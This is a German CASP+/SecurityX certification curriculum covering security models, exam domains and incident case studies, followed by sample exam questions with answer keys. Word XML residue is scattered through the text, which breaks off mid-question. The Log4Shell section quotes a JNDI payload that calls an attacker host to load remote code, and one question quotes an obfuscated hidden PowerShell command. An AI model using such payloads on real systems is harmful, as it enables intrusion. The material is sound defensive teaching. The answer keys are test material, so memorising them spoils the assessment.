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Wissenschaftlich fundierter Lehrplan zur Zertifizierung als CompTIA Advanced Security Practitioner (CASP+) und SecurityX</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Fundamentale Prinzipien und didaktische Architektur des Lehrplans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fortschreitende Komplexität globaler Cyberbedrohungen erfordert ein Höchstmaß an technischer Expertise, operativer Resilienz und strategischer Weitsicht von IT-Sicherheitsexperten. Die Zertifizierung zum CompTIA Advanced Security Practitioner (CASP+), welche mit der Einführung der Version CAS-005 unter dem neuen Nomenklatur-Paradigma "SecurityX" firmiert, repräsentiert den Gipfel des CompTIA Cybersecurity Career Pathways.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Dieser Lehrplan wurde als erschöpfende, wissenschaftlich fundierte Schulungsunterlage konzipiert, die darauf abzielt, Kandidaten nicht nur auf das Bestehen der Prüfung vorzubereiten, sondern sie kognitiv und technisch zu befähigen, als Architekten und Senior Security Engineers in hochkomplexen Unternehmensumgebungen zu agieren.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Das didaktische Design dieses Curriculums basiert auf der Taxonomie von Bloom (Bloom's Taxonomy) sowie dem European Cybersecurity Skills Framework (ECSF) der(</w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0b57d0"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.enisa.europa.eu/publications/european-cybersecurity-skills-framework-ecsf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), um sicherzustellen, dass kognitive Lernziele von der reinen Wissensreproduktion über die Analyse von Angriffsvektoren bis hin zur Evaluierung und Kreation komplexer Sicherheitsarchitekturen abgedeckt werden.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Die Kombination dieser Frameworks ermöglicht es, die Lerninhalte an den zwölf typischen Rollenprofilen europäischer Cybersicherheitsexperten, insbesondere dem Chief Information Security Officer (CISO) und dem Security Architect, auszurichten.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Im Gegensatz zu reinen Management-Zertifizierungen verlangt das SecurityX-Curriculum eine tiefe, praktische Durchdringung der Materie, die es dem Praktiker erlaubt, strategische Vorgaben in messbare, technische Kontrollen zu übersetzen.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Lehrplan integriert die vier Hauptdomänen der CAS-005 (SecurityX) Prüfung und reflektiert die Gewichtsverschiebung gegenüber der vorherigen CAS-004 Version. Die neuen Domänen umfassen Governance, Risk and Compliance mit einem Anteil von 20 Prozent, Security Architecture mit 27 Prozent, Security Engineering mit 31 Prozent sowie Security Operations mit 22 Prozent.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Um die Lückenlosigkeit und Anschaulichkeit zu garantieren, wird jedes theoretische Konstrukt mit detaillierten historischen Angriffsszenarien, deren Vektoren und den entsprechenden CASP+-spezifischen Mitigationsstrategien verknüpft.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Wissenschaftliche Grundlagen der Security Architecture und formale Modelle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Bevor spezifische Prüfungsinhalte vermittelt werden, muss das Fundament der Sicherheitsarchitektur und des Systems Security Engineerings verstanden werden. Diese Modelle bilden das Rückgrat für Entscheidungen, die ein SecurityX-Experte in realen Unternehmensumgebungen treffen muss. Die Architektur sicherer Systeme erfordert ein tiefes Verständnis formaler Informationsfluss- und Integritätsmodelle, die als theoretische Basis für die Gestaltung von Mandatory Access Control (MAC) Systemen und verteilten Architekturen dienen.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Das Bell-LaPadula-Modell, welches in den 1970er Jahren vom US-Militär entwickelt wurde, fokussiert sich ausschließlich auf die Vertraulichkeit (Confidentiality) von Daten.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 operiert auf Basis eines gitterbasierten Zugriffsmodells (Lattice-based Access Control), welches Subjekten und Objekten spezifische Sicherheitslabels zuweist.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Die Kernprämissen sind die "Simple Security Property" (No Read Up), welche besagt, dass ein Subjekt auf einer niedrigeren Sicherheitsstufe keine Objekte auf einer höheren Stufe lesen darf, und die "* (Star) Property" (No Write Down), welche verhindert, dass ein Subjekt hochgradig vertrauliche Informationen in ein Dokument mit niedrigerer Klassifizierung schreibt, um absichtliche oder unabsichtliche Datenabflüsse zu unterbinden.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der CASP+-Praxis wird dieses Modell beim Design von Data Loss Prevention (DLP) Systemen und Multi-Level-Security-Umgebungen in Regierungsbehörden angewendet.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Das Biba-Integritätsmodell bildet das komplementäre Gegenstück zu Bell-LaPadula und fokussiert sich auf die Verhinderung der unautorisierten Modifikation von Daten.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 verhindert die Modifikation von Daten durch nicht vertrauenswürdige Subjekte. Die Axiome lauten "Simple Integrity Axiom" (No Read Down), wonach ein Subjekt keine Daten geringerer Integrität lesen darf, um nicht durch falsche Informationen korrumpiert zu werden, und "Star Integrity Axiom" (No Write Up), welches verhindert, dass Subjekte geringerer Vertrauenswürdigkeit Daten höherer Integrität modifizieren.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Dieses Modell ist kritisch für Finanz- und Gesundheitssysteme, in denen die Korrektheit der Daten unbedingten Vorrang vor der Geheimhaltung hat.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Das Clark-Wilson-Modell geht über die einfachen Lese- und Schreibbeschränkungen hinaus und etabliert Datenintegrität durch formale Transaktionen und strikte Funktionstrennung (Separation of Duties). Es führt "Constrained Data Items" (CDIs) ein, die nur durch hochspezifische "Transformation Procedures" (TPs) verändert werden dürfen, was eine lückenlose Auditierbarkeit und die Verhinderung von internem Betrug garantiert.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Ergänzt werden diese Modelle durch das Chinese Wall Modell (Brewer-Nash), welches dynamische Zugriffsrechte basierend auf potenziellen Interessenkonflikten verwaltet, ein essenzielles Konzept für Unternehmensberatungen und Finanzinstitute.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Ein SecurityX-Kandidat muss in der Lage sein, diese formalen Modelle mit den Geschäftszielen des Unternehmens zu synchronisieren. Hierzu werden Frameworks wie SABSA und TOGAF herangezogen, deren Symbiose die Brücke zwischen Geschäftsstrategie und IT-Sicherheit schlägt.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Fokus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Struktur und Methodik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für CASP+ SecurityX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TOGAF</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
                <w:color w:val="1f1f1f"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (The Open Group Architecture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Architecture (Business, Data, Application,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Modular, prozessorientiert durch die Architecture Development Method (ADM).</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Liefert die physische und logische Basis der IT-Infrastruktur, in die Sicherheit als Enabler eingebettet werden muss.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SABSA</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
                <w:color w:val="1f1f1f"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Sherwood Applied Business Security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 Architecture &amp; Risk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 Schichten (Contextual, Conceptual, Logical, Physical, Component, Operational) x 6 W-Fragen.</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Bietet bidirektionale Traceability. Jede kryptografische Kontrolle (Component Layer) muss einem Geschäftsziel (Contextual Layer) zugeordnet sein.</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Für das Security Engineering stützt sich der Lehrplan auf die akademische Basis der(</w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0b57d0"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) ("Engineering Trustworthy Secure Systems").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Dieses Dokument definiert Systems Security Engineering (SSE) als Subdisziplin des Systems Engineerings, welche Sicherheit in jeden Aspekt des System Development Life Cycle (SDLC) integriert.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Anstatt Sicherheit durch nachgelagerte Penetrationstests zu erzwingen, fordert NIST 800-160 ein multidisziplinäres Design, das Stakeholder-Schutzbedarfe systematisch erfasst und durch physikalische, maschinelle und menschliche Komponenten umsetzt, um Systeme inhärent verteidigungsfähig und überlebensfähig (survivable) zu machen.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 1: Governance, Risk, and Compliance (GRC) (20 %)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Dieses Modul behandelt die strategische Steuerung der Informationssicherheit und spiegelt das gestiegene Gewicht (von 15 % auf 20 %) in der SecurityX-Prüfung wider.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 umfasst die Implementierung von Risikomanagement-Frameworks, die Einhaltung gesetzlicher Vorgaben (GDPR, HIPAA, PCI-DSS) und das kritische Management von Drittanbieterrisiken (Third-Party Risk Management).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Das Risikomanagement nach(</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0b57d0"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.iso.org/iso-31000-risk-management.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) bietet hierbei im Gegensatz zu compliance-getriebenen Checklisten einen prinzipienbasierten Ansatz.</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Ein CASP+-Experte muss die Phasen der Risikoidentifikation, Risikoanalyse, Risikobewertung und Risikobehandlung beherrschen und diese untrennbar in den Kontext der Geschäftsziele setzen.</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 die immense Relevanz von GRC zu veranschaulichen, dient der katastrophale Target Data Breach aus dem Jahr 2013 als historisches Fallbeispiel. Die Angreifer stahlen in diesem Fall die Zugangsdaten des HLK-Dienstleisters (Heizung, Lüftung, Klima) Fazio Mechanical Services mittels einer gezielten Spear-Phishing-E-Mail, die mit Malware infiziert war.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Da Fazio legitimen Zugang zum externen Abrechnungsnetzwerk von Target (Ariba) besaß, konnten die Angreifer den initialen Perimeter überwinden.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Aufgrund eines massiven Versagens in der Netzwerkarchitektur und fehlender Segmentierung bewegten sich die Angreifer lateral vom Abrechnungsnetzwerk in das hochsensible Point-of-Sale (POS) Netzwerk der Kassen.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Dort installierten sie eine RAM-Scraping-Malware (BlackPOS) auf über 1.700 Systemen, just vor dem umsatzstarken Black Friday.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Obwohl das FireEye-Sicherheitssystem von Target korrekte, hochpriorisierte Alarme generierte, reagierte das Security Operations Center (SOC) nicht auf die Warnungen.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Dies resultierte im Diebstahl von 40 Millionen Kreditkartendaten und 70 Millionen Personendatensätzen, was zu Kosten von über 200 Millionen US-Dollar führte.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Die CASP+-Mitigationsstrategie für ein solches Szenario basiert primär auf GRC und Architektur. Es erfordert die Implementierung eines rigiden Vendor Risk Managements, welches die Angriffsfläche der Lieferkette (Supply Chain) minimiert.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Technisch muss die Durchsetzung von Multi-Faktor-Authentifizierung (MFA) für alle Drittanbieter zwingend vorgeschrieben werden.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Architektonisch muss eine Mikrosegmentierung zwischen operativen Netzwerken (wie HLK oder Abrechnung) und Systemen erfolgen, die in den Geltungsbereich des Payment Card Industry Data Security Standard (PCI-DSS) fallen.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Neuere Vorfälle aus den Jahren 2025 und 2026 bestätigen diesen Trend. Der Angriff auf Jaguar Land Rover im September 2025, der die Produktion für fünf Wochen stilllegte und Schäden von fast 1,9 Milliarden Pfund verursachte, oder die Kompromittierung des Drift/Salesforce-Ökosystems, bei der Daten von über 700 Organisationen durch einen Third-Party-Vektor entwendet wurden, beweisen, dass Cyber-Risiken heute existenzielle Geschäftsrisiken darstellen.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Ein SecurityX-Absolvent muss daher in der Lage sein, SOC 2 Type II Audit-Reports von Zulieferern zu analysieren und vertragliche Security-SLAs durchzusetzen.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 2: Security Architecture (27 %)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dieser Domäne lernen Kandidaten, resiliente Unternehmensarchitekturen zu entwerfen, die heutigen Bedrohungen standhalten. Dies beinhaltet Cloud-Security-Modelle, Virtualisierung, Software-Defined Networking (SDN) und insbesondere die Implementierung der Zero Trust Architecture.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Die Zero Trust Architecture (ZTA) nach(</w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0b57d0"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs/specialpublications/NIST.SP.800-207.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) löst das veraltete perimeterbasierte Sicherheitsmodell ("Castle and Moat") ab.</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In einer Zero-Trust-Umgebung wird Vertrauen niemals implizit gewährt, basierend auf dem physischen oder logischen Standort im Netzwerk.</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Jeder Zugriff auf Ressourcen muss kontinuierlich dynamisch authentifiziert und autorisiert werden, wobei Prinzipien wie Mikrosegmentierung und Least Privilege in Echtzeit zum Tragen kommen.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Ein prägnantes historisches Beispiel für das Versagen von perimeterbasierter Sicherheit ist der Stuxnet-Vorfall aus dem Jahr 2010. Stuxnet war eine hochkomplexe, staatlich gesponserte Malware, die gezielt auf Supervisory Control and Data Acquisition (SCADA) Systeme abzielte, genauer gesagt auf Siemens SIMATIC WinCC/STEP 7 Software, die zur Steuerung von Urananreicherungszentrifugen im Iran verwendet wurde.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Da das Zielnetzwerk physisch vom Internet isoliert war (Air-gapped), nutzte die Malware kompromittierte USB-Laufwerke als initialen Übertragungsvektor.</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Stuxnet nutzte vier verschiedene Zero-Day-Exploits, darunter Schwachstellen im Windows Print Spooler und LNK-Dateien, um sich autonom lateral zu verbreiten.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Sobald es das anvisierte Siemens-System identifizierte, veränderte es die Rotationsgeschwindigkeit der Zentrifugen auf zerstörerische Frequenzen, während es den menschlichen Überwachungssystemen normale Betriebsparameter vortäuschte, was einer extrem fortschrittlichen Form des Replay-Angriffs entspricht.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Air-Gapping allein reicht als architektonische Kontrolle nicht aus. CASP+-Mitigationen erfordern strikte Device-Control-Richtlinien, Application Whitelisting auf industriellen Steuergeräten (ICS), kryptografische Signaturprüfung für Speicherprogrammierbare Steuerungen (SPS) und hardwarebasierte Root-of-Trust-Mechanismen.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Ein weiteres fundamentales Architektur-Risiko wurde durch die Offenlegung von Meltdown und Spectre im Jahr 2018 offensichtlich. Im Gegensatz zu traditioneller Software-Malware nutzen Meltdown (CVE-2017-5754) und Spectre (CVE-2017-5753, CVE-2017-5715) Designfehler in der physischen Hardware-Architektur moderner CPUs (Intel, AMD, ARM).</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Moderne Prozessoren nutzen "Speculative Execution" (spekulative Ausführung), um Befehle im Voraus zu verarbeiten und die Leistung zu steigern. Verwirft der Prozessor die spekulierten Daten bei fehlerhafter Vorhersage, verbleiben dennoch physikalische Spuren im CPU-Cache.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Ein Angreifer kann über hochkomplexe Cache-Timing-Side-Channel-Angriffe diese eigentlich geschützten Speicherbereiche auslesen.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Meltdown bricht die Isolation zwischen Benutzeranwendungen und dem Betriebssystemkernel, während Spectre die Isolation zwischen verschiedenen virtuellen Maschinen auf demselben physischen Host aufhebt.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Zur Mitigation müssen Architekten Microcode-Updates des CPU-Herstellers, Betriebssystem-Patches (wie Kernel Page-Table Isolation - KPTI) und die Rekompilierung von Software (z. B. mit "Retpolines") orchestrieren.</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Bei Cloud-Architekturen muss das Risiko von Cross-VM-Side-Channel-Attacken in das Risikoregister aufgenommen und durch dedizierte Hosts (Single-Tenant-Hardware) für hochsensible kryptografische Workloads mitigiert werden.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 3: Security Engineering (31 %)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Mit 31 Prozent bildet das Security Engineering den größten und technisch anspruchsvollsten Teil der SecurityX-Prüfung.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Dieses Modul fokussiert sich auf die tiefe technische Implementierung von Sicherheit in Systeme und Code. Schwerpunkte sind fortgeschrittene Kryptografie (Post-Quanten-Kryptografie, Homomorphe Verschlüsselung), Public Key Infrastructure (PKI), Endgerätesicherheit und die absolute Absicherung des Software Development Life Cycles (Secure SDLC, DevSecOps).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Der SolarWinds Supply Chain Attack aus dem Jahr 2020 demonstriert die Fragilität moderner Software-Engineering-Prozesse. Die Advanced Persistent Threat (APT) Gruppe "Cozy Bear" infiltrierte die Entwicklungsumgebung des IT-Management-Software-Herstellers SolarWinds.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Die Angreifer modifizierten den Build-Prozess und injizierten eine Backdoor (SUNBURST) in die DLL-Dateien der legitimen Orion-Netzwerkmanagement-Plattform.</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Da SolarWinds die kompromittierten Updates in gutem Glauben mit ihrem gültigen digitalen Zertifikat signierte, vertrauten die Endkunden (darunter US-Ministerien, FireEye, Microsoft) dem Update blind, womit herkömmliche signaturbasierte Erkennungssysteme wertlos wurden.</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Nach der Installation verhielt sich die Malware wochenlang unauffällig (Dormant Phase) und kontaktierte dann über Domain Generation Algorithms (DGA) externe Command-and-Control (C2) Server, um weitere Payloads wie Cobalt Strike nachzuladen.</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Dieser Vorfall beschleunigte die globale Adaption von Zero Trust massiv.</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Im Bereich Security Engineering fordert CASP+ hier die Verifizierung der Software-Integrität durch eine Software Bill of Materials (SBOM), deterministische und reproduzierbare Builds im CI/CD-Pipeline-Prozess, kontinuierliche Verhaltensanalyse (Behavioral Analytics) für hochprivilegierte Management-Server und ausgehendes Netzwerk-Traffic-Whitelisting, um unautorisierte C2-Kommunikation auf Netzwerkebene zu blockieren.</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Einen weiteren Meilenstein des Security Engineerings stellt die Log4j / Log4Shell-Schwachstelle (CVE-2021-44228) von Ende 2021 dar.</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Log4j war eine ubiquitäre Zero-Day-Vulnerabilität in der weit verbreiteten Java-Logging-Bibliothek der Apache Software Foundation.</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Log4j bot eine legitime Funktion namens JNDI (Java Naming and Directory Interface) Lookup an. Wenn eine Anwendung benutzerspezifische Eingaben (z. B. einen User-Agent-String im HTTP-Header) protokollierte und dieser String eine spezielle Syntax wie ${jndi:ldap://attacker.com/ExploitPayload} enthielt, wertete Log4j diesen String dynamisch aus.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Die Bibliothek kontaktierte den vom Angreifer kontrollierten LDAP-Server, lud eine schadhafte Java-Klasse herunter und führte sie aus, was zu sofortiger unauthentifizierter Remote Code Execution (RCE) führte.</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Log4Shell verdeutlichte das immense Risiko von "Transitive Dependencies" in der Open-Source-Lieferkette.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Mitigationsstrategien im Engineering-Umfeld erfordern tiefgreifende Software Composition Analysis (SCA) bereits in der IDE des Entwicklers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das Deaktivieren von JNDI-Lookups per Java System Property (formatMsgNoLookups=true), den Einsatz von Web Application Firewalls (WAF) mit hochaktuellen Regex-Regeln sowie Egress-Filtering auf Firewalls, um zu verhindern, dass interne Server eigenmächtig Verbindungen zu externen Ressourcen aufbauen.</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Neue Bedrohungen verlangen zudem neue Verschlüsselungstechnologien. Der Datendiebstahl bei Eurail im Jahr 2026, bei dem 1,3 Terabyte an sensiblen Passagier- und Quellcodedaten gestohlen und im Darkweb publiziert wurden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unterstreicht die Notwendigkeit fortschrittlicher Datensicherheit. SecurityX adressiert dies durch den Einsatz von Konzepten wie der homomorphen Verschlüsselung, die es erlaubt, analytische Berechnungen direkt auf verschlüsselten Daten auszuführen, ohne sie jemals im Arbeitsspeicher zu entschlüsseln, was das Risiko von Memory-Scraping und Insider-Threats drastisch reduziert.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 4: Security Operations (22 %)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Security Operations konzentriert sich auf die proaktive Verteidigung durch kontinuierliche Überwachung im SOC, Threat Hunting, Vulnerability Management, Digital Forensics und strukturierte Incident Response (IR). Der Fokus liegt auf der Analyse von Indicators of Compromise (IoC) und der Automatisierung von Abwehrmaßnahmen via SOAR (Security Orchestration, Automation, and Response).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Ein Paradebeispiel für die fatalen Folgen fehlerhafter Security Operations ist die WannaCry-Ransomware-Epidemie im Mai 2017, die weltweit über 200.000 Computer, darunter hochkritische Infrastrukturen wie das britische Gesundheitssystem (NHS) und Renault-Nissan, lahmlegte.</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WannaCry nutzte den Exploit "EternalBlue", der eine kritische Schwachstelle im Microsoft Server Message Block (SMBv1) Protokoll attackierte.</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Im Gegensatz zu traditioneller Ransomware besaß WannaCry aggressive Wurm-Eigenschaften. Sobald ein Rechner infiziert war, scannte die Malware das interne Netzwerk und das öffentliche Internet autonom nach weiteren verwundbaren SMBv1-Diensten und infizierte diese.</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Vor der Verschlüsselung der Festplatte installierte WannaCry zudem die "DoublePulsar"-Backdoor.</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Der Vorfall zeigt ein katastrophales Versagen im Enterprise Patch Management, da Microsoft den rettenden Patch (MS17-010) bereits zwei Monate vor dem Angriff veröffentlicht hatte.</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CASP+-Lösungen in den Security Operations umfassen kontinuierliches Vulnerability Scanning (SCAP, CVE)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automatisiertes Patch Deployment, Netzwerksegmentierung zur Blockierung von lateralem SMB-Traffic sowie die forensische Analyse des RAM-Speichers bei infizierten Hosts zur Beweissicherung.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Aktuelle Ransomware-Trends aus dem Jahr 2026, wie der Angriff auf die Stadt Foster City, der sämtliche öffentlichen Dienste zum Erliegen brachte, oder der durch die Hackergruppe Handala durchgeführte Angriff auf den Medizintechnikhersteller Stryker, bei dem 200.000 Unternehmensgeräte simultan auf Werkseinstellungen zurückgesetzt wurden, belegen die Zerstörungskraft moderner Attacken.</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Security Operations Teams müssen in der Lage sein, Playbooks in SOAR-Lösungen zu programmieren, die bei Erkennung solcher Anomalien infizierte Systeme in Millisekunden in Quarantäne-VLANs verschieben, bevor die Verschlüsselungsroutinen greifen können.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Umfassende Prüfungsdatenbank und Web-Integration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das geforderte Volumen einer "dreifachen Anzahl" an Prüfungsfragen architektonisch in eine Webanwendung zu integrieren, liefert dieses Kapitel die strukturelle Blaupause. CompTIA-Zertifizierungen bauen als "Stackable Certifications" aufeinander auf: Security+ bildet das Fundament, CySA+ und PenTest+ das fortgeschrittene operative Wissen, und SecurityX den Experten-Abschluss.</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Die nachfolgenden achtzehn intensiv ausgearbeiteten Fragen demonstrieren die extreme fachliche Tiefe, die für die Algorithmen der Webanwendung als Seed-Daten zur Generierung von hunderten parametrisierten Fragen dienen.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CompTIA Security+ (SY0-701) - Foundation Level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Fokus: Grundlagenverständnis, Bedrohungsidentifikation, Basis-Architektur.</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Frage ID: SEC-001 (Domäne: 2.0 Threats, Vulnerabilities, and Mitigations)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Ein Netzwerksicherheitsanalyst überprüft die Firewall-Logs und bemerkt eine ungewöhnlich hohe Anzahl von TCP-SYN-Paketen, die an den primären Webserver gerichtet sind. Der Server erhält die Pakete, sendet SYN-ACKs, erhält aber niemals ein ACK-Paket vom Client zurück. Der Server beginnt, legitime Anfragen extrem langsam zu verarbeiten. Welcher Angriffstyp liegt hier vor und welche Mitigationsstrategie ist am geeignetsten?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DNS Amplification Attack; Mitigation: Implementierung von DNSSEC auf dem Nameserver. B) SYN Flood Attack; Mitigation: Aktivierung von SYN Cookies auf der Edge-Firewall oder dem Load Balancer. C) ARP Spoofing; Mitigation: Implementierung von dynamischer ARP-Inspektion (DAI) auf den Core-Switches. D) SQL Injection; Mitigation: Einsatz einer Web Application Firewall (WAF) mit Input-Validierung.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Eine SYN Flood Attack nutzt das fundamentale Design des TCP-Three-Way-Handshakes aus. Der Angreifer sendet kontinuierlich SYN-Pakete, ignoriert jedoch das SYN-ACK des Servers (oder fälscht die Quell-IP, sodass das SYN-ACK ins Leere läuft). Dies führt dazu, dass der Server wertvolle Ressourcen (Half-open Connections) im Speicher vorhält, bis ein Timeout eintritt, was zu einem Denial-of-Service (DoS) führt. SYN Cookies wehren dies ab, indem der Server keine Ressourcen für die Verbindung reserviert, bis das finale ACK-Paket mit der kryptografisch generierten Sequenznummer eintrifft.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Option A ist inkorrekt, da DNS Amplification auf UDP basiert, nicht auf TCP. Optionen C und D adressieren völlig andere OSI-Schichten und Angriffsmuster.</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Frage ID: SEC-002 (Domäne: 3.0 Security Architecture)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Ein Unternehmen plant die Migration seiner hochsensiblen On-Premises-Datenbanken in eine Public Cloud. Um die Daten im Falle eines Diebstahls der physischen Festplatten im Rechenzentrum des Cloud-Anbieters zu schützen, soll eine Verschlüsselungstechnologie auf der untersten Speicherebene implementiert werden. Welches Konzept wird hierbei gesucht?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Transport Layer Security (TLS) Verschlüsselung für Data in Transit. B) Data Execution Prevention (DEP) zur Verhinderung von Speicherüberläufen. C) Full Disk Encryption (FDE) oder Transparent Data Encryption (TDE) für Data at Rest. D) Homomorphe Verschlüsselung für Data in Processing.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Die Frage zielt explizit auf den Schutz von "Data at Rest" (ruhenden Daten) gegen den physischen Diebstahl von Datenträgern ab. Full Disk Encryption (FDE) verschlüsselt die gesamten Datenblöcke auf dem Speichermedium, während datenbankspezifische Transparent Data Encryption (TDE) die Tabellenräume verschlüsselt, ohne dass die Applikationslogik geändert werden muss.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Option A schützt Daten lediglich bei der Übertragung über das Netzwerk. Option B ist eine Sicherheitsfunktion auf Betriebssystemebene gegen Pufferüberläufe und bietet keinen Datenschutz. Option D ermöglicht Berechnungen auf verschlüsselten Daten im RAM, ist hier jedoch nicht der gefragte primäre Anwendungsfall für physischen Speicherdiebstahl.</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Frage ID: SEC-003 (Domäne: 4.0 Security Operations)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Ein Mitarbeiter meldet den Verlust seines Firmenlaptops in einem Zug. Der Laptop ist mit BitLocker (Full Disk Encryption) gesichert, jedoch befürchtet der IT-Leiter, dass der Finder die Festplatte ausbauen und in einem anderen Computer lesen könnte. Welche Hardware-Komponente verhindert dieses Szenario, indem sie die kryptografischen Schlüssel an die spezifische Hardware bindet?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Hardware Security Module (HSM) im Rechenzentrum. B) Trusted Platform Module (TPM) auf dem Mainboard des Laptops. C) Unified Extensible Firmware Interface (UEFI) Secure Boot. D) Self-Encrypting Drives (SED) ohne Authentifizierung.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Das Trusted Platform Module (TPM) ist ein dedizierter Mikrocontroller, der entwickelt wurde, um Hardware durch integrierte kryptografische Schlüssel abzusichern.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Bei der Nutzung von BitLocker speichert das TPM den Volume Master Key (VMK). Wenn die Festplatte ausgebaut und in ein anderes System eingesetzt wird, weigert sich das TPM (da es auf dem ursprünglichen Mainboard verbleibt), den Schlüssel freizugeben, wodurch die Daten unlesbar bleiben.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Ein HSM (Option A) erfüllt ähnliche Funktionen, wird jedoch zentral in Serverracks verwendet, nicht in mobilen Endgeräten.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Frage ID: SEC-004 (Domäne: 1.0 General Security Concepts)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Ein Unternehmen möchte die Sicherheit seines Rechenzentrums erhöhen. Es installiert Überwachungskameras, biometrische Zugangsscanner und stellt Wachpersonal ein. Welche Art von Sicherheitskontrollen wurden hier primär implementiert?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Technische und administrative Kontrollen. B) Physische und präventive Kontrollen. C) Kompensierende und detektive Kontrollen. D) Logische und korrigierende Kontrollen.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Die genannten Maßnahmen (Kameras, Biometrie, Wachpersonal) sind greifbare, physische Maßnahmen zum Schutz von Einrichtungen und Hardware und fallen somit in die Kategorie der physischen Kontrollen. Da biometrische Scanner und Wachpersonal den unautorisierten Zugang im Vorfeld verhindern sollen, handeln sie als präventive Kontrollen.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Überwachungskameras sind zudem detektiv, aber die Kombination der Scanner und Wachen macht Option B zur treffendsten Klassifizierung im Security+ Rahmenwerk.</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CompTIA CySA+ (CS0-003) - Analyst Level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Fokus: Log-Analyse, Threat Hunting, Vulnerability Management, Incident Response.</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Frage ID: CYS-001 (Domäne: 1.0 Security Operations)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Während eines Proactive Threat Hunts in einem SIEM-System entdeckt ein Cybersecurity-Analyst einen stark verschleierten PowerShell-Befehl (powershell.exe -nop -w hidden -e JAB...), der ungewöhnlicherweise von einem Microsoft Word-Prozess (winword.exe) als Child-Prozess gestartet wurde. Welches strukturierte Framework sollte der Analyst nutzen, um diese Taktik, Technik und Prozedur (TTP) dem Verhalten eines bekannten Bedrohungsakteurs zuzuordnen und die Intention zu verstehen?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ISO/IEC 27001 Informationssicherheits-Managementsystem. B) MITRE ATT&amp;CK Framework. C) CVSS (Common Vulnerability Scoring System). D) OWASP Top 10 Application Security Risks.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Das MITRE ATT&amp;CK (Adversarial Tactics, Techniques, and Common Knowledge) Framework ist eine global zugängliche, extrem detaillierte Wissensdatenbank für Taktiken, Techniken und Prozeduren (TTPs) von Angreifern, basierend auf realen Beobachtungen.</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Das Starten einer unsichtbaren Powershell-Instanz aus einem Office-Dokument ist eine klassische Technik für initiale Kompromittierung (Phishing) und Execution (Malicious Macro). Option A ist ein GRC-Standard für das Management von Informationssicherheit. Option C bewertet den numerischen Schweregrad von Software-Schwachstellen, klassifiziert aber keine Verhaltensmuster von Angreifern. Option D listet die häufigsten Schwachstellen in Webanwendungen auf.</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Frage ID: CYS-002 (Domäne: 2.0 Vulnerability Management)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Ein monatlicher credentialed Schwachstellenscan identifiziert mehrere Windows-Server, denen kritische Patches fehlen. Der IT-Betrieb verweigert jedoch die sofortige Installation, da diese Legacy-Systeme eine geschäftskritische SCADA-Anwendung ausführen, die nachweislich bei einem Neustart oder Systemupdate abstürzt. Welche Vorgehensweise ist nach den Best Practices des Vulnerability Managements am besten geeignet, um das 